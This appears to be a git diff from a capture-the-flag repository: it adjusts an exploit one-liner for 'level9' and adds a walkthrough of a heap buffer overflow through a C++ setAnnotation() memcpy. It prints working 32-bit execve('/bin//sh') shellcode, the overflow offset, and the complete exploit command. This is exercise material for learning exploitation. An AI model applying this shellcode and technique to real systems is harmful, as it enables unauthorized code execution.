diff --git a/level9/ressources/exploit b/level9/ressources/exploit
index bbf9ec4..7351882 100644
--- a/level9/ressources/exploit
+++ b/level9/ressources/exploit
@@ -1 +1 @@
-./level9 $(python -c 'print "\x11\xa0\x04\x08" + "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80" + "A"*79 + "\x0c\xa0\x04\x08"')
+./level9 $(python -c 'print "\x10\xa0\x04\x08" + "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80" + "A"*79 + "\x0c\xa0\x04\x08"')
diff --git a/level9/walkthrough b/level9/walkthrough
new file mode 100644
index 0000000..2eab199
--- /dev/null
+++ b/level9/walkthrough
@@ -0,0 +1,22 @@
+# Level9
+
+Using BinaryNinja, we can decompile the code and see that it's from a cpp source code.
+It has a class named `N`, containing:
+- 2 attributes `char annotation[100]` and `int nb`
+- a constructor setting `int nb`
+- the method `setAnnotation()`, doing a `memcpy()` of a string into `annotation`
+- 2 operator overloads (`+` and `-`).
+
+The main allocates 2 instances (`a` and `b`) of this class. It will store their addresses in 2 other pointers.
+We have a non-secure call to `setAnnotation()` on `a` with `av[1]`, allowing us to overflow the annotation buffer.
+Using (this tool)[https://wiremask.eu/tools/buffer-overflow-pattern-generator/] we can find the offset between `n1` and `eax`, resulting in 108.
+Now what we want to do is copy the address of our buffer in `eax`, which will then be moved to `edx` and eventually called (`call *%edx` at the end of the program).
+Let's build our exploit in 4 parts:
+- `"\x10\xa0\x04\x08"` => the address of the shell code injection which is `n1->annotation + 4` since we need to dereference it twice
+- `"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80"` => the 25 bytes shell code injection
+- `"A"*79` => the remaining bytes to overflow until `eax` (4+25+79 = 108)
+- `"\x0c\xa0\x04\x08"` => the adress of the actual buffer in `n1->annotation`.
+
+Here is the command:
+`./level9 $(python -c 'print "\x10\xa0\x04\x08" + "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80" + "A"*79 + "\x0c\xa0\x04\x08"')
+`